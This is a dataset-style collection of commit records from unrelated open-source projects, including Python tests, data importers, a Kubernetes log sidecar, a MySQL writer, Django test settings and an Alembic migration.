y = piecewise_function(x, [-0.5, 1.2, 3, 2], [-1, 2, 1000],
dtype=tf.float32)
with tf.Session() as sess:
self.assertAlmostEqual(sess.run(y, {x: -2}), -0.5)
self.assertAlmostEqual(sess.run(y, {x: -1}), 1.2)
self.assertAlmostEqual(sess.run(y, {x: 999}), 3)
self.assertAlmostEqual(sess.run(y, {x: 1000}), 2)
self.assertAlmostEqual(sess.run(y, {x: 1001}), 2)
if __name__ == "__main__":
unittest.main()
| bsd-3-clause | Python |
|
b2acb7dfd7dc08afd64d80f25ab0a76469e5fff6 | add import script for North Lanarkshire | DemocracyClub/UK-Polling-Stations,chris48s/UK-Polling-Stations,DemocracyClub/UK-Polling-Stations,chris48s/UK-Polling-Stations,DemocracyClub/UK-Polling-Stations,chris48s/UK-Polling-Stations | polling_stations/apps/data_collection/management/commands/import_north_lanarkshire.py | polling_stations/apps/data_collection/management/commands/import_north_lanarkshire.py | from data_collection.management.commands import BaseScotlandSpatialHubImporter
"""
Note:
This importer provides coverage for 173/174 districts
due to incomplete/poor quality data
"""
class Command(BaseScotlandSpatialHubImporter):
council_id = 'S12000044'
council_name = 'North Lanarkshire'
elections = ['local.north-lanarkshire.2017-05-04']
def station_record_to_dict(self, record):
# clean up codes
record[1] = self.parse_string(record[1]).replace(' ', '').upper()
return super().station_record_to_dict(record)
def district_record_to_dict(self, record):
# clean up codes
record[0] = self.parse_string(record[0]).replace(' ', '').upper()
return super().district_record_to_dict(record)
| bsd-3-clause | Python |
|
cc907c9b8f22bd08ed6460e5e99ebb4e8ce5a499 | add import script for Perth and Kinross | DemocracyClub/UK-Polling-Stations,DemocracyClub/UK-Polling-Stations,chris48s/UK-Polling-Stations,DemocracyClub/UK-Polling-Stations,chris48s/UK-Polling-Stations,chris48s/UK-Polling-Stations | polling_stations/apps/data_collection/management/commands/import_perth_and_kinross.py | polling_stations/apps/data_collection/management/commands/import_perth_and_kinross.py | from data_collection.management.commands import BaseScotlandSpatialHubImporter
"""
Note:
This importer provides coverage for 104/107 districts
due to incomplete/poor quality data
"""
class Command(BaseScotlandSpatialHubImporter):
council_id = 'S12000024'
council_name = 'Perth and Kinross'
elections = ['local.perth-and-kinross.2017-05-04']
| bsd-3-clause | Python |
|
a9ed1a52a552d76246028d892cc6d01e5ac069cf | Move sidecar to api | polyaxon/polyaxon,polyaxon/polyaxon,polyaxon/polyaxon | api/events/monitors/sidecar.py | api/events/monitors/sidecar.py | # -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function
import logging
import os
import time
from django.conf import settings
from polyaxon_k8s.constants import PodLifeCycle
from polyaxon_k8s.manager import K8SManager
from api.config_settings import CeleryPublishTask
from api.celery_api import app as celery_app
from libs.redis_db import RedisToStream
from events.tasks import handle_events_job_logs
logger = logging.getLogger('polyaxon.monitors.sidecar')
def run(k8s_manager, pod_id, job_id):
raw = k8s_manager.k8s_api.read_namespaced_pod_log(pod_id,
k8s_manager.namespace,
container=job_id,
follow=True,
_preload_content=False)
for log_line in raw.stream():
experiment_id = 0 # TODO extract experiment id
logger.info("Publishing event: {}".format(log_line))
handle_events_job_logs.delay(experiment_id=experiment_id,
job_id=job_id,
log_line=log_line,
persist=settings.PERSIST_EVENTS)
if (RedisToStream.is_monitored_job_logs(job_id) or
RedisToStream.is_monitored_experiment_logs(experiment_id)):
celery_app.send_task(CeleryPublishTask.PUBLISH_LOGS_SIDECAR,
kwargs={'experiment_id': experiment_id,
'job_id': job_id,
'log_line': log_line})
def can_log(k8s_manager, pod_id):
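    # Poll the pod status until it is running; logs are not available before that.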
status = k8s_manager.k8s_api.read_namespaced_pod_status(pod_id,
k8s_manager.namespace)
logger.debug(status)
while status.status.phase != PodLifeCycle.RUNNING:
time.sleep(settings.LOG_SLEEP_INTERVAL)
status = k8s_manager.k8s_api.read_namespaced_pod_status(pod_id,
k8s_manager.namespace)
def main():
pod_id = os.environ['POLYAXON_POD_ID']
job_id = os.environ['POLYAXON_JOB_ID']
k8s_manager = K8SManager(namespace=settings.NAMESPACE, in_cluster=True)
can_log(k8s_manager, pod_id)
run(k8s_manager, pod_id, job_id)
logger.debug('Finished logging')
if __name__ == '__main__':
main()
| apache-2.0 | Python |
|
6b81d938ed99a943e8e81816b9a013b488d4dfd8 | Add util.py to decode wordpiece ids in Transformer | lcy-seso/models,PaddlePaddle/models,lcy-seso/models,PaddlePaddle/models,PaddlePaddle/models,kuke/models,qingqing01/models,kuke/models,kuke/models,kuke/models,lcy-seso/models,qingqing01/models,qingqing01/models | fluid/neural_machine_translation/transformer/util.py | fluid/neural_machine_translation/transformer/util.py | import sys
import re
import six
import unicodedata
# Regular expression for unescaping token strings.
# '\u' is converted to '_'
# '\\' is converted to '\'
# '\213;' is converted to unichr(213)
# Inverse of escaping.
_UNESCAPE_REGEX = re.compile(r"\\u|\\\\|\\([0-9]+);")
# This set contains all letter and number characters.
_ALPHANUMERIC_CHAR_SET = set(
six.unichr(i) for i in range(sys.maxunicode)
if (unicodedata.category(six.unichr(i)).startswith("L") or
unicodedata.category(six.unichr(i)).startswith("N")))
def tokens_to_ustr(tokens):
"""
Convert a list of tokens to a unicode string.
"""
token_is_alnum = [t[0] in _ALPHANUMERIC_CHAR_SET for t in tokens]
ret = []
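    # Insert a space only between two adjacent alphanumeric tokens.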
for i, token in enumerate(tokens):
if i > 0 and token_is_alnum[i - 1] and token_is_alnum[i]:
ret.append(u" ")
ret.append(token)
return "".join(ret)
def subtoken_ids_to_tokens(subtoken_ids, vocabs):
"""
Convert a list of subtoken(wordpiece) ids to a list of tokens.
"""
concatenated = "".join(
[vocabs.get(subtoken_id, u"") for subtoken_id in subtoken_ids])
split = concatenated.split("_")
ret = []
for t in split:
if t:
unescaped = unescape_token(t + "_")
if unescaped:
ret.append(unescaped)
return ret
def unescape_token(escaped_token):
"""
Inverse of encoding escaping.
"""
def match(m):
if m.group(1) is None:
return u"_" if m.group(0) == u"\\u" else u"\\"
try:
return six.unichr(int(m.group(1)))
except (ValueError, OverflowError) as _:
return u"\u3013" # Unicode for undefined character.
trimmed = escaped_token[:-1] if escaped_token.endswith(
"_") else escaped_token
return _UNESCAPE_REGEX.sub(match, trimmed)
def subword_ids_to_str(ids, vocabs):
"""
Convert a list of subtoken(word piece) ids to a native string.
Refer to SubwordTextEncoder in Tensor2Tensor.
"""
return tokens_to_ustr(subtoken_ids_to_tokens(ids, vocabs)).decode("utf-8")
| apache-2.0 | Python |
|
e69da5fb3550703c466cd8ec0e084e131fb97150 | add first small and simple tests about the transcoder manager | furbrain/Coherence,ismaelgaudioso/Coherence,opendreambox/python-coherence,ismaelgaudioso/Coherence,unintended/Cohen,sreichholf/python-coherence,coherence-project/Coherence,furbrain/Coherence,sreichholf/python-coherence,opendreambox/python-coherence,coherence-project/Coherence,unintended/Cohen | coherence/test/test_transcoder.py | coherence/test/test_transcoder.py |
from twisted.trial.unittest import TestCase
from coherence.transcoder import TranscoderManager
from coherence.transcoder import (PCMTranscoder, WAVTranscoder, MP3Transcoder,
MP4Transcoder, MP2TSTranscoder, ThumbTranscoder)
known_transcoders = [PCMTranscoder, WAVTranscoder, MP3Transcoder, MP4Transcoder,
MP2TSTranscoder, ThumbTranscoder]
# move this into the implementation to allow easier overwriting
def getuniquename(transcoder_class):
return getattr(transcoder_class, 'id')
class TranscoderTestMixin(object):
def setUp(self):
self.manager = TranscoderManager()
def tearDown(self):
# as it is a singleton ensuring that we always get a clean
# and fresh one is tricky and hacks the internals
TranscoderManager._instance = None
del self.manager
class TestTranscoderManagerSingletony(TranscoderTestMixin, TestCase):
def test_is_really_singleton(self):
#FIXME: singleton tests should be outsourced some when
old_id = id(self.manager)
new_manager = TranscoderManager()
self.assertEquals(old_id, id(new_manager))
class TestTranscoderAutoloading(TranscoderTestMixin, TestCase):
def setUp(self):
self.manager = None
def test_is_loading_all_known_transcoders(self):
self.manager = TranscoderManager()
for klass in known_transcoders:
self.assertEquals(self.manager.transcoders[getuniquename(klass)], klass)
| mit | Python |
|
d1958e834182fd7d43b97ea17057cc19dff21ca1 | Test addr response caching | Bitcoin-ABC/bitcoin-abc,Bitcoin-ABC/bitcoin-abc,Bitcoin-ABC/bitcoin-abc,Bitcoin-ABC/bitcoin-abc,Bitcoin-ABC/bitcoin-abc,Bitcoin-ABC/bitcoin-abc,Bitcoin-ABC/bitcoin-abc,Bitcoin-ABC/bitcoin-abc,Bitcoin-ABC/bitcoin-abc,Bitcoin-ABC/bitcoin-abc,Bitcoin-ABC/bitcoin-abc,Bitcoin-ABC/bitcoin-abc,Bitcoin-ABC/bitcoin-abc | test/functional/p2p_getaddr_caching.py | test/functional/p2p_getaddr_caching.py | #!/usr/bin/env python3
# Copyright (c) 2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test addr response caching"""
import time
from test_framework.messages import (
CAddress,
NODE_NETWORK,
msg_addr,
msg_getaddr,
)
from test_framework.p2p import (
P2PInterface,
p2p_lock
)
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import (
assert_equal,
)
MAX_ADDR_TO_SEND = 1000
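# Maximum number of addresses a node packs into a single addr message.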
def gen_addrs(n):
addrs = []
for i in range(n):
addr = CAddress()
addr.time = int(time.time())
addr.nServices = NODE_NETWORK
# Use first octets to occupy different AddrMan buckets
first_octet = i >> 8
second_octet = i % 256
addr.ip = "{}.{}.1.1".format(first_octet, second_octet)
addr.port = 8333
addrs.append(addr)
return addrs
class AddrReceiver(P2PInterface):
def __init__(self):
super().__init__()
self.received_addrs = None
def get_received_addrs(self):
with p2p_lock:
return self.received_addrs
def on_addr(self, message):
self.received_addrs = []
for addr in message.addrs:
self.received_addrs.append(addr.ip)
def addr_received(self):
return self.received_addrs is not None
class AddrTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = False
self.num_nodes = 1
def run_test(self):
self.log.info('Create connection that sends and requests addr '
'messages')
addr_source = self.nodes[0].add_p2p_connection(P2PInterface())
msg_send_addrs = msg_addr()
self.log.info('Fill peer AddrMan with a lot of records')
# Since these addrs are sent from the same source, not all of them
# will be stored, because we allocate a limited number of AddrMan
# buckets per addr source.
total_addrs = 10000
addrs = gen_addrs(total_addrs)
for i in range(int(total_addrs / MAX_ADDR_TO_SEND)):
msg_send_addrs.addrs = addrs[i * MAX_ADDR_TO_SEND:
(i + 1) * MAX_ADDR_TO_SEND]
addr_source.send_and_ping(msg_send_addrs)
responses = []
self.log.info('Send many addr requests within short time to receive')
N = 5
cur_mock_time = int(time.time())
for i in range(N):
addr_receiver = self.nodes[0].add_p2p_connection(AddrReceiver())
addr_receiver.send_and_ping(msg_getaddr())
# Trigger response
cur_mock_time += 5 * 60
self.nodes[0].setmocktime(cur_mock_time)
addr_receiver.wait_until(addr_receiver.addr_received)
responses.append(addr_receiver.get_received_addrs())
for response in responses[1:]:
assert_equal(response, responses[0])
assert(len(response) < MAX_ADDR_TO_SEND)
cur_mock_time += 3 * 24 * 60 * 60
self.nodes[0].setmocktime(cur_mock_time)
self.log.info('After time passed, see a new response to addr request')
last_addr_receiver = self.nodes[0].add_p2p_connection(AddrReceiver())
last_addr_receiver.send_and_ping(msg_getaddr())
# Trigger response
cur_mock_time += 5 * 60
self.nodes[0].setmocktime(cur_mock_time)
last_addr_receiver.wait_until(last_addr_receiver.addr_received)
# new response is different
assert(set(responses[0]) !=
set(last_addr_receiver.get_received_addrs()))
if __name__ == '__main__':
AddrTest().main()
| mit | Python |
|
9698e473615233819f886c5c51220d3a213b5545 | Add initial prototype | nok/git-walk,nok/git-walk | script.py | script.py | #!/usr/bin/env python
import sys
import subprocess as subp
cmd = '' if len(sys.argv) <= 1 else str(sys.argv[1])
if cmd in ['prev', 'next']:
log = subp.check_output(['git', 'rev-list', '--all']).strip()
log = [line.strip() for line in log.split('\n')]
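    # rev-list output is newest-first, so "next" moves toward index 0 and "prev" away from it.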
pos = subp.check_output(['git', 'rev-parse', 'HEAD']).strip()
idx = log.index(pos)
# Next commit:
if cmd == 'next':
if idx > 0:
subp.call(['git', 'checkout', log[idx - 1]])
else:
print("You're already on the latest commit.")
# Previous commit:
else:
if idx + 1 <= len(log) - 1:
subp.call(['git', 'checkout', 'HEAD^'])
else:
print("You're already on the first commit.")
else:
print('Usage: git walk prev|next')
| mit | Python |
|
6500bc2682aeecb29c79a9ee9eff4e33439c2b49 | Add verifica_diff script | palcu/infooltenia,palcu/infooltenia,palcu/infooltenia,palcu/infooltenia,palcu/infooltenia,palcu/infooltenia | conjectura/teste/verifica_diff.py | conjectura/teste/verifica_diff.py | from sh import cp, rm, diff
import sh
import os
SURSA_VERIFICATA = 'conjectura-inturi.cpp'
cp('../' + SURSA_VERIFICATA, '.')
os.system('g++ ' + SURSA_VERIFICATA)
filename = 'grader_test'
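# Run the compiled solution on each test case and diff its output against the reference .ok file.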
for i in range(1, 11):
print 'Testul ', i
cp(filename + str(i) + '.in', 'conjectura.in')
os.system('./a.out')
print diff('conjectura.out', filename + str(i) + '.ok')
for extension in ['in', 'out']:
rm('conjectura.' + extension)
rm(SURSA_VERIFICATA)
rm('a.out')
| mit | Python |
|
5d769d651947384e18e4e9c21a10f86762a3e950 | add more tests | PyBossa/pybossa,Scifabric/pybossa,Scifabric/pybossa,PyBossa/pybossa | test/test_api/test_api_announcement.py | test/test_api/test_api_announcement.py | # -*- coding: utf8 -*-
# This file is part of PYBOSSA.
#
# Copyright (C) 2017 Scifabric LTD.
#
# PYBOSSA is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# PYBOSSA is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with PYBOSSA. If not, see <http://www.gnu.org/licenses/>.
import json
from default import db, with_context
from test_api import TestAPI
from factories import AnnouncementFactory
from factories import UserFactory, HelpingMaterialFactory, ProjectFactory
from pybossa.repositories import AnnouncementRepository
from mock import patch
announcement_repo = AnnouncementRepository(db)
class TestAnnouncementAPI(TestAPI):
@with_context
def test_query_announcement(self):
"""Test API query for announcement endpoint works"""
owner = UserFactory.create()
user = UserFactory.create()
# project = ProjectFactory(owner=owner)
announcements = AnnouncementFactory.create_batch(9)
announcement = AnnouncementFactory.create()
# As anon
url = '/announcements/'
res = self.app_get_json(url)
data = json.loads(res.data)
assert len(data['announcements']) == 10, data
| agpl-3.0 | Python |
|
18b22600f94be0e6fedd6bb202753736d61c85e6 | Add alternative settings to make test debugging easier | jfterpstra/bluebottle,jfterpstra/bluebottle,onepercentclub/bluebottle,jfterpstra/bluebottle,onepercentclub/bluebottle,jfterpstra/bluebottle,onepercentclub/bluebottle,onepercentclub/bluebottle,onepercentclub/bluebottle | runserver_settings.py | runserver_settings.py | from django.conf import global_settings
import os
SITE_ID = 1
TIME_ZONE = 'Europe/Amsterdam'
PROJECT_ROOT = os.path.join(os.path.dirname(__file__))
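# Keep all test artifacts (media, static assets, SQLite database) under bluebottle/test_files.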
MEDIA_ROOT = os.path.join(PROJECT_ROOT, 'bluebottle', 'test_files', 'media')
STATIC_ROOT = os.path.join(PROJECT_ROOT, 'bluebottle', 'test_files', 'assets')
STATICI18N_ROOT = os.path.join(PROJECT_ROOT, 'bluebottle', 'test_files', 'global')
STATICFILES_DIRS = (
(os.path.join(PROJECT_ROOT, 'bluebottle', 'test_files', 'global')),
)
STATIC_URL = '/static/assets/'
MEDIA_URL = '/static/media/'
COMPRESS_ENABLED = False  # True causes tests to fail for some reason
STATICFILES_FINDERS = [
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
# django-compressor staticfiles
'compressor.finders.CompressorFinder',
]
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(PROJECT_ROOT, 'bluebottle', 'test_files', 'test.db'),
# 'NAME': ':memory:',
}
}
SECRET_KEY = '$311#0^-72hr(uanah5)+bvl4)rzc*x1&b)6&fajqv_ae6v#zy'
INSTALLED_APPS = (
# Django apps
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.staticfiles',
#3rp party apps
'compressor',
'registration',
'rest_framework',
'social_auth',
'south',
'taggit',
'templatetag_handlebars',
# Bluebottle apps
'bluebottle.accounts',
'bluebottle.common',
'bluebottle.geo',
)
MIDDLEWARE_CLASSES = [
# Have a middleware to make sure old cookies still work after we switch to domain-wide cookies.
'bluebottle.bluebottle_utils.middleware.SubDomainSessionMiddleware',
'django.middleware.locale.LocaleMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# https://docs.djangoproject.com/en/1.4/ref/clickjacking/
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.transaction.TransactionMiddleware',
]
TEMPLATE_DIRS = (
os.path.join(PROJECT_ROOT, 'bluebottle', 'test_files', 'templates'),
)
TEMPLATE_LOADERS = [
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
'apptemplates.Loader', # extend AND override templates
]
TEMPLATE_CONTEXT_PROCESSORS = global_settings.TEMPLATE_CONTEXT_PROCESSORS + (
# Makes the 'request' variable (the current HttpRequest) available in templates.
'django.core.context_processors.request',
'django.core.context_processors.i18n'
)
AUTH_USER_MODEL = 'accounts.BlueBottleUser'
ROOT_URLCONF = 'bluebottle.urls'
SESSION_COOKIE_NAME = 'bb-session-id'
# Django-registration settings
ACCOUNT_ACTIVATION_DAYS = 4
HTML_ACTIVATION_EMAIL = True # Note this setting is from our forked version.
SOUTH_TESTS_MIGRATE = False # Make south shut up during tests
SELENIUM_TESTS = True
SELENIUM_WEBDRIVER = 'phantomjs' # Can be any of chrome, firefox, phantomjs
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
DEBUG = True
TEMPLATE_DEBUG = True
USE_EMBER_STYLE_ATTRS = True
| bsd-3-clause | Python |
|
a1f411be91a9db2193267de71eb52db2f334641b | add a file that prints hello lesley | ctsit/J.O.B-Training-Repo-1 | hellolesley.py | hellolesley.py | #This is my hello world program to say hi to Lesley
print 'Hello Lesley'
| apache-2.0 | Python |
|
03b80665f6db39002e0887ddf56975f6d31cc767 | Create __init__.py | shyampurk/m2m-traffic-corridor,shyampurk/m2m-traffic-corridor,shyampurk/m2m-traffic-corridor | server/__init__.py | server/__init__.py | mit | Python |
||
33581b5a2f9ca321819abfd7df94eb5078ab3e7c | Add domain.Box bw compatibility shim w/deprecation warning | Alwnikrotikz/py-lepton,AlanZatarain/py-lepton,jmichelsen/py-lepton,jmichelsen/py-lepton,tectronics/py-lepton,AlanZatarain/py-lepton,tectronics/py-lepton,Alwnikrotikz/py-lepton | lepton/domain.py | lepton/domain.py | #############################################################################
#
# Copyright (c) 2008 by Casey Duncan and contributors
# All Rights Reserved.
#
# This software is subject to the provisions of the MIT License
# A copy of the license should accompany this distribution.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
#
#############################################################################
"""Domains represent regions of space and are used for generating vectors
(positions, velocities, colors). Domains are also used by controllers to test
for collision. Colliding with domains can then influence particle
behavior
"""
__version__ = '$Id$'
from random import random, uniform
from math import sqrt
from particle_struct import Vec3
from _domain import Line, Plane, AABox, Sphere
class Domain(object):
"""Domain abstract base class"""
def generate(self):
"""Return a point within the domain as a 3-tuple. For domains with a
non-zero volume, 'point in domain' is guaranteed to return true.
"""
raise NotImplementedError
def __contains__(self, point):
"""Return true if point is inside the domain, false if not."""
raise NotImplementedError
def intersect(self, start_point, end_point):
"""For the line segment defined by the start and end point specified
(coordinate 3-tuples), return the point closest to the start point
where the line segment intersects surface of the domain, and the
surface normal unit vector at that point as a 2-tuple. If the line
segment does not intersect the domain, return the 2-tuple (None,
None).
Only 2 or 3 dimensional domains may be intersected.
Note performance is more important than absolute accuracy with this
method, so approximations are acceptable.
"""
raise NotImplementedError
def Box(*args, **kw):
"""Axis-aligned box domain (same as AABox for now)
WARNING: Deprecated, use AABox instead. This domain will mean something different
in future versions of lepton
"""
import warnings
warnings.warn("lepton.domain.Box is deprecated, use AABox instead. "
"This domain class will mean something different in future versions of lepton",
stacklevel=2)
return AABox(*args, **kw)
| #############################################################################
#
# Copyright (c) 2008 by Casey Duncan and contributors
# All Rights Reserved.
#
# This software is subject to the provisions of the MIT License
# A copy of the license should accompany this distribution.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
#
#############################################################################
"""Domains represent regions of space and are used for generating vectors
(positions, velocities, colors). Domains are also used by controllers to test
for collision. Colliding with domains can then influence particle
behavior
"""
__version__ = '$Id$'
from random import random, uniform
from math import sqrt
from particle_struct import Vec3
from _domain import Line, Plane, AABox, Sphere
class Domain(object):
"""Domain abstract base class"""
def generate(self):
"""Return a point within the domain as a 3-tuple. For domains with a
non-zero volume, 'point in domain' is guaranteed to return true.
"""
raise NotImplementedError
def __contains__(self, point):
"""Return true if point is inside the domain, false if not."""
raise NotImplementedError
def intersect(self, start_point, end_point):
"""For the line segment defined by the start and end point specified
(coordinate 3-tuples), return the point closest to the start point
where the line segment intersects surface of the domain, and the
surface normal unit vector at that point as a 2-tuple. If the line
segment does not intersect the domain, return the 2-tuple (None,
None).
Only 2 or 3 dimensional domains may be intersected.
Note performance is more important than absolute accuracy with this
method, so approximations are acceptable.
"""
raise NotImplementedError
| mit | Python |
03fdc41437f96cb1d6ba636c3a5d8c5dc15430b1 | Create requirements.py | pesaply/sarafu,Hojalab/sarafu,pesaply/sarafu,Hojalab/sarafu | requirements.py | requirements.py | mit | Python |
||
ab99f855f708dec213c9eea1489643c01526e0b0 | Add unittests for bridgedb.parse.versions module. | pagea/bridgedb,pagea/bridgedb | lib/bridgedb/test/test_parse_versions.py | lib/bridgedb/test/test_parse_versions.py | # -*- coding: utf-8 -*-
#_____________________________________________________________________________
#
# This file is part of BridgeDB, a Tor bridge distribution system.
#
# :authors: Isis Lovecruft 0xA3ADB67A2CDB8B35 <[email protected]>
# please also see AUTHORS file
# :copyright: (c) 2014, The Tor Project, Inc.
# (c) 2014, Isis Lovecruft
# :license: see LICENSE for licensing information
#_____________________________________________________________________________
"""Unittests for :mod:`bridgedb.parse.versions`."""
from __future__ import print_function
from twisted.trial import unittest
from bridgedb.parse import versions
class ParseVersionTests(unittest.TestCase):
"""Unitests for :class:`bridgedb.parse.versions.Version`."""
def test_Version_with_bad_delimiter(self):
"""Test parsing a version number which uses '-' as a delimiter."""
self.assertRaises(versions.InvalidVersionStringFormat,
versions.Version, '2-6-0', package='tor')
def test_Version_really_long_version_string(self):
"""Parsing a version number which is way too long should raise
an IndexError which is ignored.
"""
v = versions.Version('2.6.0.0.beta', package='tor')
self.assertEqual(v.prerelease, 'beta')
self.assertEqual(v.major, 6)
def test_Version_string(self):
"""Test converting a valid Version object into string form."""
v = versions.Version('0.2.5.4', package='tor')
self.assertEqual(v.base(), '0.2.5.4')
| bsd-3-clause | Python |
|
caef0059d803fc885d268ccd66b9c70a0b2ab129 | Create Exercise4_VariablesAndNames.py | hrahadiant/LearnPythonTheHardWay | Exercise4_VariablesAndNames.py | Exercise4_VariablesAndNames.py | # Exercise 4 : Variables and Names
cars = 100
space_in_a_car = 4.0
drivers = 30
passengers = 90
cars_not_driven = cars - drivers
cars_driven = drivers
carpool_capacity = cars_driven * space_in_a_car
average_passengers_per_cars = passengers / cars_driven
print("There are", cars, "cars available.")
print("There are only", drivers, "drivers available.")
print("There will be", cars_not_driven, "empty cars today.")
print("We can transport", carpool_capacity, "people today.")
print("We have", passengers, "to carpool today.")
print("We need to put about", average_passengers_per_cars, "in each car.")
| mit | Python |
|
7b00bbb576df647a74b47b601beff02af308d16a | Add MySQL output target | ibbd-dev/ibbdETL,ibbd-dev/ibbdETL | src/target/mysql.py | src/target/mysql.py | # -*- coding: utf-8 -*-
# Author: mojiehua
# Email: [email protected]
# Created Time: 2017-07-18 17:38:44
import pymysql
class Target:
"""
    Write rows into a MySQL database. The target table must be created in
    advance, and its columns should match the fields being written.
    Supported configuration parameters (params):
    host: MySQL host address
    port: MySQL port (optional, default 3306)
    user: user name
    passwd: password
    db: database name
    table: table name
    charset: character set (optional, default utf8)
    Example configuration:
    params:
        host: 127.0.0.1
        port: 3306
        user: root
        passwd: root
        db: test
        charset: utf8
        table: testmysql
        batch: true
        batchNum: 1000
"""
params = {}
def __init__(self, params):
params['charset'] = params['charset'] if 'charset' in params else 'utf8'
params['port'] = int(params['port']) if 'port' in params else 3306
self.params = params
self._host = params['host']
self._port = params['port']
self._user = params['user']
self._passwd = params['passwd']
self._db = params['db']
self._charset = params['charset']
self._table = params['table']
self._conn = None
self._cursor = None
def get_conn(self):
try:
conn = pymysql.connect(host = self._host,
port = self._port,
user = self._user,
passwd = self._passwd,
db = self._db,
charset = self._charset)
return conn
except Exception as e:
            print('Database connection error:', e)
raise e
def write(self, row):
if self._conn is None:
self._conn = self.get_conn()
self._cursor = self._conn.cursor()
sql = self.constructSQLByRow(row)
try:
self._cursor.execute(sql,(list(row.values())))
self._conn.commit()
except Exception as e:
print(e)
            print('Insert failed, skipping this record:', row)
def constructSQLByRow(self,row):
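        # Build a parameterized INSERT statement so values are escaped by the driver.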
fields = ','.join(row.keys())
values = ','.join(['%s' for _ in row.values()])
sql = '''INSERT INTO {tb}({column}) VALUES ({values}) '''.format(tb=self._table,column=fields,values=values)
return sql
def batch(self, rows):
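        # Insert a batch of rows and commit once at the end; failing rows are skipped.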
if self._conn is None:
self._conn = self.get_conn()
self._cursor = self._conn.cursor()
for row in rows:
try:
sql = self.constructSQLByRow(row)
self._cursor.execute(sql,(list(row.values())))
except Exception as e:
print(e)
                print('Insert failed, skipping this record:', row)
self._conn.commit()
def __del__(self):
if self._cursor:
self._cursor.close()
if self._conn:
self._conn.close()
| apache-2.0 | Python |
|
1a4db50c848a3e7bb1323ae9e6b26c884187c575 | Add my fibonacci sequence homework. | bigfatpanda-training/pandas-practical-python-primer,bigfatpanda-training/pandas-practical-python-primer | training/level-1-the-zen-of-python/dragon-warrior/fibonacci/rwharris-nd_fibonacci.py | training/level-1-the-zen-of-python/dragon-warrior/fibonacci/rwharris-nd_fibonacci.py | def even_fibonacci_sum(a:int,b:int,max:int) -> int:
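    # Walk the Fibonacci sequence up to max, accumulating the even-valued terms.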
temp = 0
sum = 0
while (b <= max):
if (b%2 == 0):
sum += b
temp = a + b
a = b
b = temp
    return sum
print(even_fibonacci_sum(1, 2, 4000000))
| artistic-2.0 | Python |
|
f14c483283984b793f1209255e059d7b9deb414c | Add in the db migration | MaxPresman/cfapi,smalley/cfapi,smalley/cfapi,codeforamerica/cfapi,codeforamerica/cfapi,MaxPresman/cfapi,MaxPresman/cfapi,smalley/cfapi | migrations/versions/8081a5906af_.py | migrations/versions/8081a5906af_.py | """empty message
Revision ID: 8081a5906af
Revises: 575d8824e34c
Create Date: 2015-08-25 18:04:56.738898
"""
# revision identifiers, used by Alembic.
revision = '8081a5906af'
down_revision = '575d8824e34c'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.add_column('organization', sa.Column('member_count', sa.Integer(), nullable=True))
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_column('organization', 'member_count')
### end Alembic commands ###
| mit | Python |